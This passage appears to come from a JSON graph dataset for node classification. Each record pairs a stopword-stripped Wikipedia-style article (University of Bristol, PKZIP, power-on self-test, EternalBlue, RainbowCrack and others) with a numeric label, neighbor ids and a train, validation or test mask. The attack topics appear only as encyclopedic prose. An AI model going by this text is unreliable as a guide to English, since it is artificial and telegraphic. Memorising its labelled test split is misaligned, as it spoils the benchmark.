undergraduate residence 33 colston street opened city centre october 2011 acquiring property 2009 university established partnership unite plc order provide accommodation due increase number students accepted entry academic year 2012/2013 £20 million project expanding facilities hiatt baker provide additional 327 places undergraduate students 2014 main halls elect groups students junior common room organise halls social calendar next year residents student houses private accommodation students living home become members orbital – society organising social events students throughout year clifton goldney hall built first early 18th century wealthy merchant goldney family eventually became part university 1956 popular location filming chronicles narnia house eliott truly madly deeply well episodes fools horses casualty filmed grotto grounds grade listed building clifton hill house another grade listed building used student accommodation clifton original building constructed 1745 1750 isaac ware used university since earliest days 1909 manor hall comprises five separate buildings principal erected 1927–1932 design george oatley following donation henry herbert wills one annexes manor house recently refurbished officially 'reopened 1999 goldney hall beautiful gardens modern accommodation complexes clifton hill house dated facilities clifton residences also possesses attractive gardens manor hall houses largest dated rooms dating back early 20th century central precinct sits hawthorns student house accommodating 115 undergraduate students house started life collection villas built somewhere 1888 1924 later converted bit bit hotel john dingle hawthorns also houses conferencing facilities staff refectory bar accommodation office student houses office several residences central precinct recent built managed third-party organisations exclusivity arrangements university include new bridewell house opened 2016 includes en-suite bedrooms studios former police hq operated fresh student housing unite house chantry court opened 2000 2003 respectively unite group well dean court 2001 postgraduates woodland court 2005 run dominion housing group current academics university bristol include 18 fellows academy medical sciences 10 fellows british academy 13 fellows royal academy engineering 31 fellows royal society include sir michael berry one discoverers quantum mechanics geometric phase john rarity international expert quantum optics quantum cryptography quantum communication david may computer scientist lead architect transputer mark horton british maritime historical archaeologist academics computer science include david cliff inventor seminal zip trading algorithm peter flach mike fraser professor human-computer interaction julian gough nigel smart past academics university include patricia broadfoot vice-chancellor university gloucestershire nigel thrift vice-chancellor university warwick wendy larner provost victoria university wellington anthony epstein co-discoverer epstein-barr virus professor pathology university 1968–1982 sir john lennard-jones discoverer lennard-jones potential physics alfred marshall one university college principals influential economist latter part 19th century mathematicians philosophers rohit parikh brian rotman lectured mathematics department philosopher science paul feyerabend taught department philosophy university bristol associated three ig nobel prizes award unusual trivial achievements scientific research sir michael berry shared award andre geim nobel laureate using magnets levitate frog gareth jones also shared ig nobel prize scientifically documenting fellatio fruit bats dr. len fisher awarded 1999 prize physics calculating optimal way dunk biscuit bristol alumnus paul dirac went win nobel prize physics 1933 contribution formulation quantum mechanics considered one significant physicists 20th century notable scientists include dani rabaiotti environmental scientist science communicator notable alumni include writers dick king-smith sarah kane olivier award winning playwright laura wade angela carter dorothy simpson david gibbins david nicholls author novel starter ten turned screenplay set university bristol mark simmons author business books hutton economist author commentator entertainment current affairs former students include journalist mcmafia author misha glenny james landale bbc news chief political correspondent founded university independent newspaper epigram author journalist julie myerson william lewis editor-in-chief telegraph media group derren brown illusionist sue lawley radio 4 presenter alastair stewart newsreader dominic waghorn sky news us correspondent susanna reid itv breakfast anchor studied politics philosophy law university 1989 1992 also editor student newspaper epigram comedy matt lucas david walliams simon pegg chris morris creator controversial brass eye jon richardson comedy stars include chris langham thick fame standup comic marcus brigstocke alumni include mike bennett digital media entrepreneur albert ii prince monaco musician james blunt former liberal democrat mp lembit öpik president bristol university students union time sir jonathan evans former head mi5 anne mcclain member 2013 nasa astronaut class nkosazana dlamini-zuma chairperson african union commission october 2012 january 2017. notable alumni film television production department include film directors mick jackson michael winterbottom marc evans christopher smith alex cox peter webber maddie moate amongst many others",
    "neighbors": [
      9984,
      10116,
      1862,
      9801,
      127,
      11055,
      4595,
      4916,
      6648,
      2428,
      415
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10117,
    "label": 3,
    "text": "Synchronous_Data_Flow:synchronous data flow synchronous dataflow restriction kahn process networks nodes produce consume fixed number data items per firing allows static scheduling",
    "neighbors": [
      5090
    ],
    "mask": "None"
  },
  {
    "node_id": 10118,
    "label": 8,
    "text": "Microsoft_services:microsoft services microsoft online services refers hosted technology solutions consumers businesses services previously branded windows live umbrella among services offered webmail storage contacts calendar accessed microsoft account microsoft services team provides wide range consulting support services consumers partners businesses web services feature metro user interface ui header contains pull-down element allows users switch outlook.com people calendar skydrive header color also changes depending web service user using exception outlook.com allows users customize header color according preference interface also in-built messaging sidebar allows users interact contacts messenger facebook skype using instant messages audio calls video calls",
    "neighbors": [
      4704,
      9448,
      8740
    ],
    "mask": "Test"
  },
  {
    "node_id": 10119,
    "label": 4,
    "text": "Insider_threat_management:insider threat management insider threat management process preventing combating detecting monitoring employees remote vendors contractors fortify organization data theft fraud damage insider individual employed agency access facilities sensitive information organizational data information systems equipment may accounts giving legitimate access computer systems access originally given serve performance duties permissions could abused harm organization insiders often familiar organization data intellectual property well methods place protect makes easier insider circumvent security controls aware physical proximity data means insider need hack organizational network outer perimeter traversing firewalls rather building already often direct access organization internal network insider threats harder defend attacks outsiders since insider already legitimate access organization information assets insiders may comprise permanent temporary employees vendors contractors suppliers ex-employees common insiders elevated access utilize sensitive information without drawing suspicion however anyone insider threat organization dispose secure utilize sensitive information described agency regulations cases individuals compromised opposing agency exploited individual financial status threats life factors order force individual comply opposing agencies demands insider may attempt steal property information personal gain benefit another organization country attacks may range information data stolen destruction business property insiders may perform following threats organization insiders similar characteristics compiled order help determine possible threats researchers identified insiders mainly show antisocial behavior may include limited machiavellianism narcissism psychopathy information system side list common behavioral indicators known insiders insider threat program management educational resources national insider threat special interest group nitsig created response u.s. goverment presidential executive order 13587 structural reforms improve security classified networks responsible sharing safeguarding classified information national insider threat policy national industrial security program operating manual conforming change 2 nitsig created function national insider threat information sharing analysis center nitsig membership largest network 1000+ insider threat mitigation professionals u.s. globally willingness members collaborate share information among membership driving force made nitsig successful encourage become member attend meetings events charge become member https //nationalinsiderthreatsig.org insider threat defense group one first companies offer comprehensive insider threat program development management training u.s. government agencies department defense intelligence community defense contractors required develop implement insider threat programs https //www.insiderthreatdefense.us damaging insider threat incident impacts insider threat incidents severe costly damaging incidents insiders malicious non-malicious insider incidents damaging malicious incidents listed link numerous insider threat incidents severe impacts organizations https //www.insiderthreatdefense.us/insider-threat/",
    "neighbors": [
      5722,
      9750,
      8638,
      3495
    ],
    "mask": "Test"
  },
  {
    "node_id": 10120,
    "label": 4,
    "text": "CloudEndure:cloudendure cloudendure cloud computing company develops business continuity software disaster recovery continuous backup live migration cloudendure headquartered united states r israel cloudendure founded 2012 ofer gadish ceo gil shai cro ofir ehrlich vp r leonid feinberg vp product founders previously established acceloweb acquired limelight networks 2011 cloudendure raised total 18.2 million private investors companies dell emc vmware mitsui infosys magma venture partners awards cloudendure include 2017 crn emerging vendors award storage startups 2016 gartner cool vendor award cloudendure products integrated oem software several partner company services including integration google cloud vm migration service integrations cisco systems cloudcenter disaster recovery migration sungard availability services cloud recovery amazon made offer purchase cloudendure january 2019 200 250 million negotiated price outbid google acquired company january 10 2019 cloudendure disaster recovery performs continuous block-level replication saves dormant copy target infrastructure uses smaller percentage compute storage memory primary site leads minimal rtos recovery time objective rpos recovery point objective spun disaster company offers two tiers disaster recovery well continuous backup live migration products cloudendure ’ software service saas application-agnostic replicate workloads physical virtual cloud-based infrastructure variety target sites including amazon web services aws google cloud platform gcp microsoft azure vmware cloudendure ltd. holds pending seven patents including disaster recovery disaster recovery plan drp business continuity recovery time objective rto recovery point objective rpo continuous data protection",
    "neighbors": [
      3366,
      6153,
      1935,
      7248,
      6514,
      6834,
      982
    ],
    "mask": "None"
  },
  {
    "node_id": 10121,
    "label": 6,
    "text": "PKZIP:pkzip pkzip file archiving computer program notable introducing popular zip file format pkzip first introduced ms-dos ibm-pc compatible platform 1989 since versions released number architectures operating systems pkzip originally written phil katz marketed company pkware inc bearing initials 'pk 1970s file archiving programs distributed standard utilities operating systems include unix utilities ar shar tar utilities designed gather number separate files single archive file easier copying distribution archives could optionally passed stream compressor utility compress others archivers also appeared 1980s including arc system enhancement associates inc. sea rahul dhesi zoo dean w. cooper dwc lharc haruhiko okomura haruyasu yoshizaki arj stands archived robert jung development pkzip first announced file softdev.doc within pkpak 3.61 package stating would develop new yet unnamed compression program announcement made following lawsuit sea pkware inc although sea suit lost compression war user base migrated pkzip compressor choice led bbs sysops refused accept offer files compressed .arc files users began recompressing old archives currently stored .arc format .zip files first version released 1989 dos command-line tool distributed shareware model us 25 registration fee us 47 manual help ensure interoperability zip format phil katz published original .zip file format specification appnote.txt documentation file pkware continued maintain document periodically published updates originally bundled registered versions pkzip later available pkware site specification version number necessarily correspond pkzip version numbers especially pkzip 6 later various times pkware adds preliminary features allows pkzip products extract archives using advanced features pkzip products create archives wo n't available next major release although popular time zip archives using pkzip 1.0 compression methods rare many modern unzip tools unable handle shrinking reducing although imploding usually supported shrinking uses dynamic lzw unisys held patents patent reduce algorithm also filed june 19 1984 long pkzip produced pkware also used pkzip standards following products",
    "neighbors": [
      10756,
      6022,
      10886,
      1420,
      6797,
      9745,
      1940,
      3222,
      9880,
      2201,
      11432,
      3114,
      10027,
      9388,
      3629,
      950,
      6713,
      2755,
      11076,
      3142,
      7366,
      1352,
      4296,
      10317,
      9166,
      10575,
      4561,
      722,
      4441,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      237,
      1646,
      6129,
      7667,
      6389,
      4089,
      8700,
      894,
      10623
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10122,
    "label": 2,
    "text": "Portable_Distributed_Objects:portable distributed objects portable distributed objects pdo application programming interface api creating object-oriented code executed remotely network computers created next computer inc. using openstep system whose use objective-c made package easy write characterized light weight high speed comparison similar systems corba versions pdo available solaris hp-ux versions openstep system version worked microsoft ole also available called d'ole allowing distributed code written using pdo platform presented microsoft systems local ole objects pdo one number distributed object systems created early 1990s design model front end applications gui-based microcomputers would call code running mainframe minicomputers processing data storage microsoft evolving ole component object model com similar distributed version called dcom ibm system object model som/dsom sun microsystems promoting distributed objects everywhere host smaller players well exception limited functionality com systems extremely heavyweight tended large slow often difficult use pdo hand relied small number features objective-c runtime handle portability well distribution key feature language support second chance method classes method call object failed object n't support normally allowed languages due strong typing runtime would bundle message compact format pass back object codice_1 method normal behavior codice_1 return error including details taken message invocation pdo instead supplied number new objects codice_1 methods passed invocation object another machine network various versions support different networks platforms calling methods remote objects almost invisible network setup lines typically pdo objects instantiated locally called way object system pdo object forwarded invocation remote computer processing unbundled results returned comparison corba pdo programs typically 1/10 less size common next staffers write magazines showing re-implement multi-page corba article perhaps 15 lines code programming standpoint nearly nothing easy use pdo however pdo also reliant entirely objective-c function price unwilling pay time c++ widely used effort shift codebases entirely new language paradigm considered onerous pdo never saw much use next emphasis shifted new webobjects framework 1995 pdo continues used mac os x programmers method interprocess interapplication communication communication networked applications need compatibility mac os x applications addition os x platform gnustep implementation distributed objects",
    "neighbors": [
      9665,
      2980,
      10470,
      7307,
      10029,
      8303,
      8304,
      2804,
      1304,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10123,
    "label": 7,
    "text": "Animaker:animaker animaker diy video animation software software cloud-based launched 2014 allows users create animated videos using pre-built characters templates 2017 animaker became first tool launch animated vertical video creator animaker cloud-based video animation software first launched open beta version 2014 february 2015 software officially launched based freemium model allowed users free account option software provides online tools create edit video animation software developed animaker inc video based saas company founded rs raghavan animaker uses html5 adobe flash create animated videos exported facebook youtube downloaded mp4 file software also available chrome extension chrome web store",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10124,
    "label": 5,
    "text": "HSTCP:hstcp highspeed tcp hstcp congestion control algorithm protocol defined rfc 3649 transport control protocol tcp standard tcp performs poorly networks large bandwidth-delay product unable fully utilize available bandwidth hstcp makes minor modifications standard tcp congestion control mechanism overcome limitation ack received congestion avoidance window increased formula_1 loss detected triple duplicate acknowledgments window decreased formula_2 w current window size congestion window small hstcp behaves exactly like standard tcp w 1 b w 0.5 tcp congestion window beyond certain threshold w b w become functions current window size region congestion window increases value w increases value b w decreases means hstcp window grow faster standard tcp also recover losses quickly behavior allows hstcp friendly standard tcp flows normal networks also quickly utilize available bandwidth networks large bandwidth delay products hstcp slow start/timeout behavior standard tcp since congestion control mechanism modified hstcp used tcp options like sack real implementations determining increase decrease parameters given current window size implemented lookup table",
    "neighbors": [
      7017,
      10924,
      2934,
      5817,
      9021,
      2079
    ],
    "mask": "Test"
  },
  {
    "node_id": 10125,
    "label": 8,
    "text": ".htpasswd:.htpasswd .htpasswd flat-file used store usernames password basic authentication apache http server name file given .htaccess configuration anything although .htpasswd canonical name file name starts dot unix-like operating systems consider file begins dot hidden file often maintained shell command htpasswd add delete update users properly encode password use easily checked reversed back original password file consists rows row corresponding username followed colon followed string containing hashed password optionally prepended algorithm specifier 2y apr1 sha and/or salt hash historically used unix crypt style md5 sha1 common alternatives although version 2.2.18 variant md5 default resources available apache http server restricted users listed files created htpasswd .htpasswd file used protect entire directory placed well particular files",
    "neighbors": [
      865,
      4485,
      3462,
      8554,
      5397,
      119,
      4893,
      10815
    ],
    "mask": "Test"
  },
  {
    "node_id": 10126,
    "label": 8,
    "text": "Digg_Reader:digg reader digg reader news aggregator operated digg reader released june 26 2013 response google reader shutting reader web-based also ios android applications well google chrome extension beta reader received mostly positive reviews march 26 2018 digg shut digg reader digg reader created response google reader shutting andrew mclaughlin ceo digg saw blog post fall 2012 speculating google reader shutting sent note one friends google jokingly offering buy reader mclaughlin sent serious reply said nothing buy february 2013 mclaughlin friend google said referring google reader ’ telling anything ’ going keep thing around forever maybe want something ready end year. ” google announced google reader shutting july 1 2013 digg announced development digg reader night digg officially announced development reader march 13 2013 instead original plan late 2013 moving project top priority list promised simulate best features google reader also updating fit 2013 digg reader initially launched june 21 2013 invite service launched publicly june 26 2013 july 2 2013 digg reader announced crawling 7.7 million feeds march 14 2018 digg announced would shutting digg reader march 26 2018 june 27 2013 digg reader integrated digg ios app form update digg decided make reader separate app company sees digg.com digg reader complementary products cnet gave app 3/5 stating digg beautiful app blends social news rss subscriptions bugs missing features make suitable committed digg users app current version rating 4.5 5 itunes app received app store best 2013 award apple well best 2013 award techcrunch august 29 2013 digg released android app digg reader digg says android app common request users app rating 3.9 5 google play october 9 2013 digg released google chrome extension digg reader extension rating 4 5 chrome web store early reviews beta mostly positive mashable liked saying extremely impressed criticized lack features search tagging pc magazine gave 4/5 praising clean design speed free price tag criticized lack opml support inability log email address required connection google autostraddle gave thumbs citing neat streamlined look free price tag speed disappointed n't share feature facebook twitter techcrunch impressed digg able produce functional google reader alternative said current form digg reader replacement google reader blinklist.com said good way get news want lacked certain appeal compared free apps maclife critical giving 2/5 stating barely accomplishes creators set ’ little doubt digg reader improve time gate disappoints despite clean user interface many basic features lacking especially kind rss solution power users depended upon google reader provide",
    "neighbors": [
      1664,
      3971,
      8584,
      4490,
      11274,
      3350,
      11418,
      11674,
      2076,
      10270,
      1834,
      4013,
      559,
      9908,
      7488,
      10057,
      5205,
      4310,
      5078,
      6231,
      6237,
      10722,
      3428,
      5605,
      8169,
      9451,
      8557,
      9325,
      7921,
      119,
      11000,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 10127,
    "label": 2,
    "text": "Kongoni_(operating_system):kongoni operating system kongoni linux distribution used free version linux kernel distributed linux-libre project development kongoni project currently dormant kongoni desktop oriented operating system strong belief free freedom aimed easy install use customize kongoni ship include offer ability install software approved free software foundation kongoni shona word gnu animal gnu project takes name name chosen represents spirit history kongoni linux operating system african origin release kongoni named great philosophers including aristotle sophocles nietzsche cicero version kongoni compatible slackware release based natively install packages slackware project currently dormant september 2010 project maintained one developer robert gabriel previously project maintained a.j venter kongoni offered live cd option install os hard-drive kongoni os installs software use ports allows one download source code program opposed pre-compiled binary file compiled built automatically users system offers benefit smaller downloads programs may run faster and/or use less memory compiled explicitly users system kongoni shipped several pieces unique code including",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      10780,
      543,
      11297,
      3618,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      10817,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      7812,
      8326,
      8837,
      9353,
      9873,
      11410,
      2195,
      8857,
      10394,
      6301,
      1694,
      5279,
      10397,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      1761,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      8957,
      7938,
      4355,
      4360,
      7435,
      2321,
      1813,
      5397,
      4887,
      6934,
      8992,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      4493,
      912,
      11155,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      4011,
      9646,
      1455,
      948,
      439,
      9660,
      10694,
      4039,
      5067,
      975,
      8147,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      499,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 10128,
    "label": 4,
    "text": "Juanita_Moody:juanita moody juanita moody née morris may 29 1924 – february 17 2015 american cryptographer intelligence analyst worked signals intelligence service national security agency 1943 1976 juanita morris born 1924 morven north carolina began studying western carolina university 1942 left early 1943 join war effort volunteered recruitment office charlotte north carolina april sent arlington hall headquarters signals intelligence service arlington virginia began training cryptanalysis waiting security clearance later transferred administrative library role remained interested cryptanalysis however joined group met outside work study complex unbroken german code system result assigned official code-related tasks successful breaking german one-time pad cipher end war promoted code clerk head office planned return western carolina university end war supervisor asked remain sis agreed condition given complicated job 1948 married fellow civil servant warren moody moody promoted national security agency research development department war became involved computational cryptanalysis analytic machines 1950s supervisor soviet analytic affairs early 1960s head signals intelligence operations gather information cuba operation mongoose chief office non-communist nations oversaw nsa responses cuban missile crisis october 1962 responsible deciding information relating crisis would collected processed released promoted higher positions nsa throughout 1960s early 1970s became focus controversy 1975 called testify front senate committee investigating abuses power federal intelligence agencies name widely associated investigation press nsa later clarified involved abuses power involvement investigation spokesperson 1975 moody awarded inaugural national intelligence medal achievement retired nsa following year 33 years working agency inducted nsa hall honor 2003",
    "neighbors": [
      1941,
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 10129,
    "label": 2,
    "text": "Hive_UI:hive ui hive stylized hive custom rom developed xolo built android operating system v 4.4.4 kitkat hive exclusive xolo devices licensed third-parties hive designed xolo software design team bangalore users interact development team share ideas new features hive development team aims release over-the-air updates new features bug fixes every fortnight first xolo device 8x-1000 hive launched august 2014",
    "neighbors": [
      4995,
      5892,
      5637,
      1670,
      7428,
      9610,
      2828,
      5262,
      8719,
      3600,
      5522,
      1427,
      7700,
      10645,
      280,
      10009,
      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8486,
      1191,
      1959,
      937,
      1578,
      5546,
      6057,
      5677,
      7595,
      7983,
      10537,
      3380,
      5431,
      1083,
      2875,
      3900,
      10045,
      196,
      69,
      6212,
      8262,
      11082,
      8907,
      332,
      4685,
      3664,
      2001,
      3409,
      8019,
      8870,
      2901,
      8280,
      5467,
      8285,
      8413,
      479,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      5613,
      8940,
      5620,
      11252,
      7548,
      2045,
      11391
    ],
    "mask": "None"
  },
  {
    "node_id": 10130,
    "label": 2,
    "text": "Power-on_self-test:power-on self-test power-on self-test post process performed firmware software routines immediately computer digital electronic device powered article mainly deals posts personal computers many embedded systems major appliances avionics communications medical equipment also self-test routines automatically invoked power-on results post may displayed panel part device output external device stored future retrieval diagnostic tool since self-test might detect system usual human-readable display non-functional indicator lamp speaker may provided show error codes sequence flashes beeps addition running tests post process may also set initial state device firmware case computer post routines part device pre-boot sequence complete successfully bootstrap loader code invoked load operating system ibm pc compatible computers main duties post handled bios may hand duties programs designed initialize specific peripheral devices notably video scsi initialization duty-specific programs generally known collectively option roms individually video bios scsi bios etc principal duties main bios post follows functions served post bios versions back first later bios versions post also bios begins post cpu reset first memory location cpu tries execute known reset vector case hard reboot northbridge direct code fetch request bios located system flash memory warm boot bios located proper place ram northbridge direct reset vector call ram earlier pc systems chipsets standard bios rom would located address range included reset vector bios ran directly rom motherboard bios rom segment f000 conventional memory map post flow contemporary bios one first things bios determine reason executing cold boot example may need execute functionality however system supports power saving quick boot methods bios may able circumvent standard post device discovery simply program devices preloaded system device table post flow pc developed simple straightforward process one complex convoluted post bios must integrate plethora competing evolving even mutually exclusive standards initiatives matrix hardware oses pc expected support although simple memory tests setup screen displayed earlier bioses around turn millennium post would perform thorough test devices including complete memory test design ibm modeled larger e.g mainframe systems would perform complete hardware test part cold-start process pc platform evolved commodity consumer device mainframe- minicomputer-inspired high-reliability features parity memory thorough memory test every post dropped models exponential growth pc memory sizes driven equally exponential drop memory prices also factor duration memory test using given cpu directly proportional memory size original ibm pc could equipped little 16 kb ram typically 64 640 kb depending amount equipped memory computer 4.77 mhz 8088 required five seconds 1.5 minutes complete post way skip beginning ibm xt memory count displayed post instead blank screen modern pc bus rate around 1 ghz 32-bit bus might 2000x even 5000x faster might 3 gb memory—5000x people concerned boot times 1980s 30 60 second memory test adds undesirable delay benefit confidence perceived worth cost users clone pc bioses allowed user skip post ram check pressing key modern machines often performed ram test unless enabled via bios setup addition modern dram significantly reliable dram 1980s part starting sequence post routines may display prompt user key press access built-in setup functions bios allows user set various options particular mother board operating system loaded key pressed post proceed boot sequence required load installed operating system original ibm bios made post diagnostic information available outputting number i/o port 80 screen display possible failure modes progress indication error codes generated case failure generate code code last successful operation available aid diagnosing problem using logic analyzer dedicated post cardan interface card shows port 80 output small displaya technician could determine origin problem operating system running computer code displayed board may become meaningless since oses e.g linux use port 80 i/o timing operations actual numeric codes possible stages error conditions differ one bios supplier another codes different bios versions single supplier may also vary although many codes remain unchanged different versions later bioses used sequence beeps motherboard-attached pc speaker present working signal error codes vendors developed proprietary variants enhancements msi d-bracket post beep codes vary manufacturer manufacturer information numeric beep codes available manufacturers bioses motherboards websites collect codes many bioses reference amibios8 check point beep code list version 2.0 last updated 10 june 2008 post beep codes covered specifically comptia a+ exam apple macintosh computers also perform post cold boot event fatal error mac make startup chime macs made 1987 prior 1998 upon failing post immediately halt death chime sound varies model beep car crash sound sound shattering glass short musical tone screen working sad mac icon along two hexadecimal strings used identify problem macs made prior 1987 crashed silently hexadecimal string sad mac icon apple introduced imac 1998 radical departure macs time imac began production new world macs called new world macs imac power macintosh g3 blue white power mac g4 pci graphics powerbook g3 bronze keyboard powerbook g3 firewire load mac os rom hard drive event error fatal hardware error display screen seen holding startup error message instead 0 prompt event fatal hardware error give beeps beep codes revised october 1999 since addition models power led would flash cadence amiga historical line computers a1000 4000 present interesting post sequence prompts user sequence flashing screens different colors rather audible beeps systems show various hardware post tests correct else failed amiga system performs following steps boot system fails rom test screen display turns red system halts almost amiga models present color sequence turned black screen dark gray light gray color screens filling monitor screen rapid sequence amigas taken usually 2 least max 3 seconds turn boot a4000 presents light gray screen boot time occurs 2 max 3 seconds keyboards historical amiga models proprietary happened early computer ages pragmatically based international standard ansi/iso 8859-1 keyboard intelligent device processor 4 kilobytes ram keeping buffer sequence keys pressed thus communicate user fault found flashing main led sequence",
    "neighbors": [
      5000,
      10253,
      5520,
      3496,
      4910,
      7983,
      8625,
      823,
      576,
      7106,
      6597,
      6093,
      2383,
      10839,
      6499,
      8035,
      4581,
      9066,
      1515,
      8301,
      1903,
      7151,
      6129,
      9466,
      2811,
      3324
    ],
    "mask": "Train"
  },
  {
    "node_id": 10131,
    "label": 4,
    "text": "Vlastimil_Klíma:vlastimil klíma rndr vlastimil klíma born 19 february 1957 benešov czech republic leading cryptographer computer security expert white hat hacker academic taught applied cryptography faculty mathematics physics charles university prague author several works field cryptographic hash functions digital signatures klíma received doctorate faculty mathematics physics charles university 1984 dr. klíma former head research development group federal ministry defense czech republic czech national security authority klíma authored world ’ first on-the-fly encryption system windows 95 98/nt/2000 ethical hacker successfully broke ssl protocol currently works digital security sector",
    "neighbors": [
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10132,
    "label": 4,
    "text": "EternalBlue:eternalblue eternalblue cyberattack exploit developed u.s. national security agency nsa according testimony former nsa employees leaked shadow brokers hacker group april 14 2017 one month microsoft released patches vulnerability may 12 2017 worldwide wannacry ransomware used exploit attack unpatched computers june 27 2017 exploit used help carry 2017 notpetya cyberattack unpatched computers exploit also reported used since march 2016 chinese hacking group buckeye apt3 likely found re-purposed tool well reported used part retefe banking trojan since least september 5 2017 eternalblue exploits vulnerability microsoft implementation server message block smb protocol vulnerability denoted entry common vulnerabilities exposures cve catalog vulnerability exists smb version 1 smbv1 server various versions microsoft windows mishandles specially crafted packets remote attackers allowing execute arbitrary code target computer nsa alert microsoft vulnerabilities held five years breach forced hand agency warned microsoft learning eternalblue ’ possible theft allowing company prepare software patch issued march 2017 delaying regular release security patches february 2017 tuesday march 14 2017 microsoft issued security bulletin ms17-010 detailed flaw announced patches released windows versions currently supported time windows vista windows 7 windows 8.1 windows 10 windows server 2008 windows server 2012 windows server 2016 many windows users installed patches two months later may 12 2017 wannacry ransomware attack used eternalblue vulnerability spread next day microsoft released emergency security patches unsupported windows xp windows 8 windows server 2003 february 2018 eternalblue ported windows operating systems since windows 2000 risksense security researcher sean dillon eternalchampion eternalromance two exploits originally developed nsa leaked shadow brokers also ported event made available open sourced metasploit modules end 2018 millions systems still vulnerable eternalblue led millions dollars damages due primarily ransomware worms following massive impact wannacry notpetya badrabbit caused 1 billion worth damages 65 countries using eternalblue either initial compromise vector method lateral movement may 2019 baltimore struggled cyberattack digital extortionists using eternalblue attack froze thousands computers shut email disrupted real estate sales water bills health alerts many services since 2012 four baltimore city chief information officers fired resigned two left investigation eternalblue tool relies flaw microsoft software though company issued patch leakers posted tools online many systems remain vulnerable two years later existence patch prompted security researchers argue saturday responsibility baltimore breach lies city security consultant rob graham wrote tweet “ organization substantial numbers windows machines gone 2 years without patches ’ squarely fault organization eternalblue ” according microsoft united states nsa responsible dint controversial strategy stockpiling vulnerabilities least preventing microsoft timely public patching presumably hidden bugs eternalrocks microbotmassivenet computer worm infects microsoft windows uses seven exploits developed nsa comparatively wannacry ransomware program infected 230,000 computers may 2017 uses two nsa exploits making researchers believe eternalrocks significantly dangerous worm discovered via honeypot eternalblue among several exploits used conjunction doublepulsar backdoor implant tool eternalrocks first installs tor private network conceals internet activity access hidden servers brief 24 hour incubation period server responds malware request downloading self-replicating host machine malware even names wannacry avoid detection security researchers unlike wannacry eternalrocks possess kill switch ransomware",
    "neighbors": [
      1024,
      5636,
      10756,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      9256,
      5173,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      7786,
      107,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      2709,
      1688,
      2717,
      9375,
      8368,
      9904,
      9395,
      8886,
      3789,
      7887,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      9569,
      3956,
      9082,
      10110,
      11152,
      3473,
      4505,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      4074,
      2542,
      2041,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 10133,
    "label": 5,
    "text": "Java_Embedding_Plugin:java embedding plugin java embedding plugin jep enables java mac os x non safari browsers plugin shipped firefox 1.5 recent versions seamonkey camino latest released version 0.9.7.5 requires mac os x 10.4.11 higher originally powerpc based macs port intel x86 needed version 0.9.6.1 security vulnerability allowed remote attackers crash browser",
    "neighbors": [
      10057,
      499,
      5078,
      6231,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 10134,
    "label": 7,
    "text": "Informatica:informatica informatica software development company founded 1993 headquartered redwood city california core products include enterprise cloud data management data integration co-founded gaurav dhillon diaz nesamoney anil chakravarthy company ceo april 29 1999 initial public offering nasdaq stock exchange listed shares stock symbol infa april 7 2015 permira canada pension plan investment board announced company controlled permira funds cppib would acquire informatica approximately us 5.3 billion august 6 2015 acquisition completed microsoft salesforce ventures additional investors company stock ceased trading nasdaq ticker symbol infa effective date informatica product portfolio focused data integration extract transform load information lifecycle management business-to-business data exchange cloud computing integration complex event processing data masking data quality data replication data virtualization master data management ultra messaging components form toolset establishing maintaining data warehouses customer base 5,000 companies 2006 informatica announced cloud business informatica grown combination sales growth company acquisitiond",
    "neighbors": [
      4194,
      2691,
      7781,
      679,
      5960,
      10090,
      8751,
      10735,
      10236,
      9789
    ],
    "mask": "None"
  },
  {
    "node_id": 10135,
    "label": 4,
    "text": "RainbowCrack:rainbowcrack rainbowcrack computer program generates rainbow tables used password cracking rainbowcrack differs conventional brute force crackers uses large pre-computed tables called rainbow tables reduce length time needed crack password drastically rainbowcrack developed zhu shuanglei implements improved time–memory tradeoff cryptanalysis attack originated philippe oechslin ophcrack organizations made rainbowcrack rainbow tables available free internet",
    "neighbors": [
      3937,
      7426,
      8513,
      6916,
      7556,
      4140,
      6797,
      7983,
      3984,
      3477,
      1941,
      823,
      8827,
      2716,
      733
    ],
    "mask": "None"
  },
  {
    "node_id": 10136,
    "label": 1,
